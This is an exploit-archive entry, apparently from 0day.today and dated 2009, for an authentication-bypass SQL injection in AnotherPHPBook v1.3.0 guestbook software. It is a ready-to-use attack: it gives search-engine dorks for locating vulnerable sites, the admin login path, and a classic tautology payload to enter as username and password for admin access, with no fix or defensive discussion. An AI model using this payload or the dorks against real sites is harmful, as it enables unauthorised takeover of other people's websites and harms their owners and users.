id: 5524
date: 07/20/2009
title: AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
author: n3w7u
cves: 

======================================================================
AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
======================================================================


########################################################################

                APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

########################################################################
#                            AUTHOR: n3w7u
#
## Download: www.clanscripte.net/main.php?content=download&do=dl&dlid=81
#
## Dorks:                 inurl:apbook/index.php
#  or
#         AnotherPHPBook (APB) v.1.3.0 © 2001 by Stephan Baumeister (zap)
#########################################################################
#
## Exploit:
# 
#  http://[host]/[path]/admin/index.php
#
#    [!]
#           Put as username and password: 'or 1=1/*
#           You will log in as admin
#
#
#########################################################################



#  0day.today [2023-03-23]  #